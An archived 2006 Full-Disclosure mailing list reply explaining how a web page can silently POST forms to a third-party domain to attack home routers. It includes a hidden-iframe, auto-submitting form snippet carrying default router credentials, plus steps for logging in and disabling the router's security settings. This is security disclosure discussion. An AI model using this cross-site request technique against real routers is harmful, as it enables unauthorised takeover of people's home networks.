[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Attacking the local LAN via XSS
- To: "pdp (architect)" <pdp.gnucitizen@xxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Attacking the local LAN via XSS
- From: Thor Larholm <thor@xxxxxxxxxxxx>
- Date: Fri, 04 Aug 2006 13:53:38 +0200
pdp (architect) wrote:
HTTP PORT is not possible on domain different from the current domain,
unless browser hacks is employed.
I'm guessing you mean HTTP POST :)
You can definitely POST any FORM to a third party domain without hacks
just by calling the submit() method of your FORM which targets a hidden
iframe. e.g.
<iframe style="display:none" id="thirdparty" name="thirdparty"></iframe>
<form name="myform" action="http://whatever.com/foo.bar"; method="POST"
target="thirdparty">
<input type="text" name="username" value="r00t">
<input type="text" name="password" value="default router password">
</form>
<script>document.myform.submit()</script>
The sequence of events would be to 1) Identify the router, 2) POST a
login request with known default logins and 3) POST a change request to
e.g. disable security settings or open a trust relationship.
The only time consuming part is gathering router identification traits
and tailoring login and change requests to specific router vendors.
--
Thor Larholm
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/